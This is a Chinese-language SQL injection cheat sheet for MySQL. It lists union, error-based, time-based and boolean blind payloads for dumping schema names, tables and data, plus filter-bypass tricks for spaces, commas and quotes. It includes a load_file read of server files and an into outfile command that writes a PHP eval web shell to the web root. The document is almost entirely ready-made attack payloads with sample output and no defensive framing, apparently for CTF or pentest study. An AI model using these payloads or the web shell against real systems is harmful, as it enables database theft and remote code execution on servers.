目录
union注入
爆字段
猜测有4个字段
union select 1,2,3,4 #
order by 4
爆表名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=数据库名),2 #
爆列名
union select 1,(select group_concat(column_name) from information_schema.columns where table_name=表名),2 #
爆数据
union select 1,(select group_concat(列名,列名,列名) from 表名),2 #
报错注入
常用报错函数
updatexml():有三个参数,注入点在第二个参数中
select updatexml(1,concat('~',(select database()),'~'),1)
extractvalue():有两个参数,注入点在第二个
select extractvalue(1,concat('~',(select database()),'~'))
floor():
CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x
这一段用来显示x字段,group by count() rand()都是必需的,因为主键重复报错
SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a
exp():通过取反产生double溢出错误报错
select exp(~(select * from(select user())x))
下面这6个可以归为一种
1.GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
2.polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
3.multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
4.multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
5.linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
6.multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
读写文件
读文件
select load_file('/var/www/1.php')
写文件
select '<?php @eval($_POST[123]);?>' into outfile 'var/www/2.php'
时间盲注
利用if()和sleep()
?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4))
布尔盲注
判断函数
substr(user(),1,1)='r'
left(database(),1)>'a'
ord(substr(database(),1,1))>114
ascii(substr(database(),1,1))>100
length(database())>5
过滤了逗号
user() regexp '^[a-z]'
mid(user() from 1 for 1)='r'
ord(substr(database()from 1 for 1))>114
ascii(substr(database()from 1 for 1))>100
position('root' in user()) 返回字符串在另一个字符串中的位置
Insert&Update&Delete注入
mysql> insert into users values(1,'test' and extractvalue(1,concat(0x7e,user(),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> update users set username='test' where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> delete from users where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
没有错误回显可以用时间盲注
mysql> insert into users values(1,'test','test' or (if((length(database())=8),sleep(5),1)));
ERROR 1062 (23000): Duplicate entry '1' for key 'PRIMARY'
mysql> update users set username='test' where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)
Rows matched: 0 Changed: 0 Warnings: 0
mysql> delete from users where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)
堆叠注入
select database();select user();
sql约束攻击
插入值的时候如果超过字段的限制长度会自动截断,导致查询时会和数据库中已有的数据相同
插入一条数据
查询user这个值
二次注入
宽字节注入
异或注入
过滤了union、or、and等,可以结合报错注入使用,本质算是布尔盲注
Bypass总结
过滤空格
/**/ 注释代替
%a0
() 括号代替
过滤逗号
join绕过
union select 1,2 #等价于
union select * from (select 1)a join (select 2)b
from for绕过
substr(database() from 1 for 1)
过滤引号
16进制字符串绕过
select column_name from information_schema.tables where table_name="users"
select column_name from information_schema.tables where table_name=0x7573657273